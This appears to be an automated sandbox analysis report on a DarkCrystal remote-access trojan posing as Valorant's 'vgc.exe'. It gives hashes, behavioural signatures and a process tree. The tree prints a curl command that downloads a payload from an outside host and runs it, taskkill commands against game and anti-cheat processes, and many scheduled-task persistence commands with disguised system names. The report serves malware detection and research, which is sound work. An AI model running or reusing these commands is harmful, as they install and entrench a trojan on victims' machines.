Analysis
-
max time kernel
26s -
max time network
30s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
07-12-2024 03:41
Static task
static1
Behavioral task
behavioral1
Sample
vgc.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
vgc.exe
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral3
Sample
vgc.exe
Resource
win11-20241007-en
General
-
Target
vgc.exe
-
Size
56KB
-
MD5
6b66076ea9dd9855bb6f8592f3778299
-
SHA1
0851a6843651c4a890f5417eede54c76bb2357b2
-
SHA256
fa2b6e2595af4fd8b7e4cedc88daf254d829132be6cb5e51fd4dbce8323f1665
-
SHA512
0dc87c60fc6c0106fb79344de207a0b17ef3c46cef0ad8035cb3fc91393c1167b0189c6ae80114b938b227136ea62b9f08be756a81846d4303d7bfd81e8db1b4
-
SSDEEP
768:T/lUHY89mrZe0xBz71sGRQGsUfzG27YNkTjq7FUMHJH:T/loM71RQGsuzZFnq7FUm
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1944 4804 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2064 4804 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3588 4804 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2160 4804 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1016 4804 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 220 4804 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5012 4804 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4864 4804 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2368 4804 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2016 4804 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1724 4804 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 444 4804 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2036 4804 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1656 4804 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3400 4804 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2688 4804 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4016 4804 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5056 4804 schtasks.exe 95 -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation vgc.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation physmeme.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation Winver.exe -
Executes dropped EXE 3 IoCs
pid Process 4884 physmeme.exe 1440 Winver.exe 3408 conhost.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\Common Files\Microsoft Shared\ink\it-IT\WaaSMedicAgent.exe Winver.exe File created C:\Program Files (x86)\Common Files\Microsoft Shared\ink\it-IT\c82b8037eab33d Winver.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Speech\physmeme.exe curl.exe File created C:\Windows\uk-UA\conhost.exe Winver.exe File created C:\Windows\uk-UA\088424020bedd6 Winver.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language physmeme.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2056 PING.EXE 2200 cmd.exe -
Kills process with taskkill 5 IoCs
pid Process 4844 taskkill.exe 4420 taskkill.exe 4516 taskkill.exe 1944 taskkill.exe 3420 taskkill.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings physmeme.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings Winver.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2056 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2036 schtasks.exe 2688 schtasks.exe 4016 schtasks.exe 1944 schtasks.exe 2064 schtasks.exe 2016 schtasks.exe 1656 schtasks.exe 3400 schtasks.exe 1016 schtasks.exe 5012 schtasks.exe 444 schtasks.exe 3588 schtasks.exe 2160 schtasks.exe 220 schtasks.exe 4864 schtasks.exe 2368 schtasks.exe 1724 schtasks.exe 5056 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 1440 Winver.exe 3408 conhost.exe 3408 conhost.exe 3408 conhost.exe 3408 conhost.exe 3408 conhost.exe 3408 conhost.exe 3408 conhost.exe 3408 conhost.exe 3408 conhost.exe 3408 conhost.exe 3408 conhost.exe 3408 conhost.exe 3408 conhost.exe 3408 conhost.exe 3408 conhost.exe 3408 conhost.exe 3408 conhost.exe 3408 conhost.exe 3408 conhost.exe 3408 conhost.exe 3408 conhost.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 4812 vgc.exe Token: SeDebugPrivilege 1440 Winver.exe Token: SeDebugPrivilege 3408 conhost.exe Token: SeDebugPrivilege 4844 taskkill.exe Token: SeDebugPrivilege 4420 taskkill.exe Token: SeDebugPrivilege 4516 taskkill.exe Token: SeDebugPrivilege 1944 taskkill.exe Token: SeDebugPrivilege 3420 taskkill.exe -
Suspicious use of WriteProcessMemory 45 IoCs
description pid Process procid_target PID 4812 wrote to memory of 3976 4812 vgc.exe 85 PID 4812 wrote to memory of 3976 4812 vgc.exe 85 PID 4812 wrote to memory of 4664 4812 vgc.exe 86 PID 4812 wrote to memory of 4664 4812 vgc.exe 86 PID 3976 wrote to memory of 632 3976 cmd.exe 87 PID 3976 wrote to memory of 632 3976 cmd.exe 87 PID 4812 wrote to memory of 4884 4812 vgc.exe 88 PID 4812 wrote to memory of 4884 4812 vgc.exe 88 PID 4812 wrote to memory of 4884 4812 vgc.exe 88 PID 4884 wrote to memory of 2168 4884 physmeme.exe 89 PID 4884 wrote to memory of 2168 4884 physmeme.exe 89 PID 4884 wrote to memory of 2168 4884 physmeme.exe 89 PID 2168 wrote to memory of 1728 2168 WScript.exe 100 PID 2168 wrote to memory of 1728 2168 WScript.exe 100 PID 2168 wrote to memory of 1728 2168 WScript.exe 100 PID 1728 wrote to memory of 1440 1728 cmd.exe 102 PID 1728 wrote to memory of 1440 1728 cmd.exe 102 PID 1440 wrote to memory of 4416 1440 Winver.exe 121 PID 1440 wrote to memory of 4416 1440 Winver.exe 121 PID 4416 wrote to memory of 3920 4416 cmd.exe 123 PID 4416 wrote to memory of 3920 4416 cmd.exe 123 PID 4416 wrote to memory of 2056 4416 cmd.exe 124 PID 4416 wrote to memory of 2056 4416 cmd.exe 124 PID 4416 wrote to memory of 3408 4416 cmd.exe 130 PID 4416 wrote to memory of 3408 4416 cmd.exe 130 PID 4812 wrote to memory of 2200 4812 vgc.exe 133 PID 4812 wrote to memory of 2200 4812 vgc.exe 133 PID 2200 wrote to memory of 4844 2200 cmd.exe 134 PID 2200 wrote to memory of 4844 2200 cmd.exe 134 PID 4812 wrote to memory of 3236 4812 vgc.exe 135 PID 4812 wrote to memory of 3236 4812 vgc.exe 135 PID 3236 wrote to memory of 4420 3236 cmd.exe 136 PID 3236 wrote to memory of 4420 3236 cmd.exe 136 PID 4812 wrote to memory of 1500 4812 vgc.exe 137 PID 4812 wrote to memory of 1500 4812 vgc.exe 137 PID 1500 wrote to memory of 4516 1500 cmd.exe 138 PID 1500 wrote to memory of 4516 1500 cmd.exe 138 PID 4812 wrote to memory of 616 4812 vgc.exe 139 PID 4812 wrote to memory of 616 4812 vgc.exe 139 PID 616 wrote to memory of 1944 616 cmd.exe 141 PID 616 wrote to memory of 1944 616 cmd.exe 141 PID 4812 wrote to memory of 2600 4812 vgc.exe 142 PID 4812 wrote to memory of 2600 4812 vgc.exe 142 PID 2600 wrote to memory of 3420 2600 cmd.exe 143 PID 2600 wrote to memory of 3420 2600 cmd.exe 143 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\vgc.exe"C:\Users\Admin\AppData\Local\Temp\vgc.exe"1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4812 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://file.garden/Z1LZlLbjjD-R7xcm/build.bin --output C:\Windows\Speech\physmeme.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3976 -
C:\Windows\system32\curl.execurl --silent https://file.garden/Z1LZlLbjjD-R7xcm/build.bin --output C:\Windows\Speech\physmeme.exe3⤵
- Drops file in Windows directory
PID:632
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:4664
-
-
C:\Windows\Speech\physmeme.exe"C:\Windows\Speech\physmeme.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ESD\UST9UxLQoHNIIFaYLHo0xhIRlgCNcLzoLb106m2nL.vbe"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ESD\bQzfgHSGdt2kLcLlkun74cHPltHDXr5Sp886hMeTP.bat" "4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\ESD\Winver.exe"C:\ESD/Winver.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1440 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\V3kk5N0Kbx.bat"6⤵
- Suspicious use of WriteProcessMemory
PID:4416 -
C:\Windows\system32\chcp.comchcp 650017⤵PID:3920
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost7⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2056
-
-
C:\Windows\uk-UA\conhost.exe"C:\Windows\uk-UA\conhost.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3408
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im VALORANT-Win64-Shipping.exe >nul 2>&12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Windows\system32\taskkill.exetaskkill /f /im VALORANT-Win64-Shipping.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im VALORANT.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:3236 -
C:\Windows\system32\taskkill.exetaskkill /f /im VALORANT.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4420
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im RiotClientServices.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Windows\system32\taskkill.exetaskkill /f /im RiotClientServices.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4516
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im vgtray.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:616 -
C:\Windows\system32\taskkill.exetaskkill /f /im vgtray.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1944
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im vgc.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:2600 -
C:\Windows\system32\taskkill.exetaskkill /f /im vgc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3420
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\sppsvc.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1944
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Default User\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2064
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3588
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "vgcv" /sc MINUTE /mo 6 /tr "'C:\ESD\vgc.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2160
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "vgc" /sc ONLOGON /tr "'C:\ESD\vgc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1016
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "vgcv" /sc MINUTE /mo 14 /tr "'C:\ESD\vgc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:220
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Windows\uk-UA\conhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5012
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\uk-UA\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4864
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Windows\uk-UA\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2368
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WaaSMedicAgentW" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Common Files\Microsoft Shared\ink\it-IT\WaaSMedicAgent.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2016
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WaaSMedicAgent" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Microsoft Shared\ink\it-IT\WaaSMedicAgent.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1724
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WaaSMedicAgentW" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Common Files\Microsoft Shared\ink\it-IT\WaaSMedicAgent.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:444
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\WmiPrvSE.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2036
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Default User\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1656
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3400
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WinverW" /sc MINUTE /mo 12 /tr "'C:\ESD\Winver.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2688
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Winver" /sc ONLOGON /tr "'C:\ESD\Winver.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4016
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WinverW" /sc MINUTE /mo 8 /tr "'C:\ESD\Winver.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5056
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
222B
MD58decf43a92645d8ba4b81696c5e7b1ae
SHA1dcc9ca8b24e3adf7568eb0f6b7f5cd27f039faf6
SHA2566ad34bd4e803fad802052423aeab64f4c60dd3ee55a3167425b9640ae24bfea1
SHA51272e44773f484d2e69ebd41cc555d9a57c833b3930e1f3b0326c90882035e0dc5fb54e8d4ded22cf9f2d28fb502b37b133b7c1c9f9d89b8c21857b569c51ebc17
-
Filesize
1.8MB
MD5d9ce1032fee5365065a78bbff7267883
SHA14c7471b47d4151908dd204303421d7c64cf4c5c6
SHA25665d26e7c0b856832e88efefe5c2a9e767fb2a7345715bbd0a6e10f9ac2afb520
SHA5120455364fa91c07da6fecbfb3e3fdbbbcb909e3176b5b151e3653f8b8ebffc02e14fb3471245df479b83f90cd2e1142bcff82b80555cfb3df113696b2925d9435
-
Filesize
57B
MD5d1a4f1e326e7dfca62327ea69446dc7c
SHA1253e264c90cbd15836d8c3a1eab3c26756d94047
SHA256ea091556a5dbab314a6029817a9db64f9b8adc7afb476bbbb11aec0c227f0de2
SHA5123d4624c169297b50329a4e13f3f559a7a1f02112f6482e45cfba747dad11c6e6642f1411cec5e92d7890f86fb38702f48c75fec4d24332d43484ad7b9dbf29c8
-
Filesize
156B
MD5a8231139440f70fd6b97d8abf931758a
SHA10a247991eeeff7618fea453f5d6915993e71e06d
SHA256e323a265b6d4af303c3f01c04cb7815999656242d92212c549e85da1d009cfc2
SHA512e8be3a10c1b41370b8bfbe5cb8311b2be68ddb3339290c3a9ba8b84a0e542c0ef5a2a37ed407888e99f31b26e1c76e23db1e25b0a8828dd056f80f3329b034ca
-
Filesize
2.1MB
MD56261ec3f13e1cc6ae25ee8942db137b0
SHA120629ed3f752869dc4980827291bf3064333405f
SHA256a6429d9778a93254c7387cf588619a2635ed97108558a122de885aad25a57eb7
SHA512ed292a77db5e9926cbaa247e449a4019776b2452d2e8cdadfcea4c3d7551372793b2a1125b44cfd5106d2b03ff178041d413750ee81bfc42d7a3252a934b51f1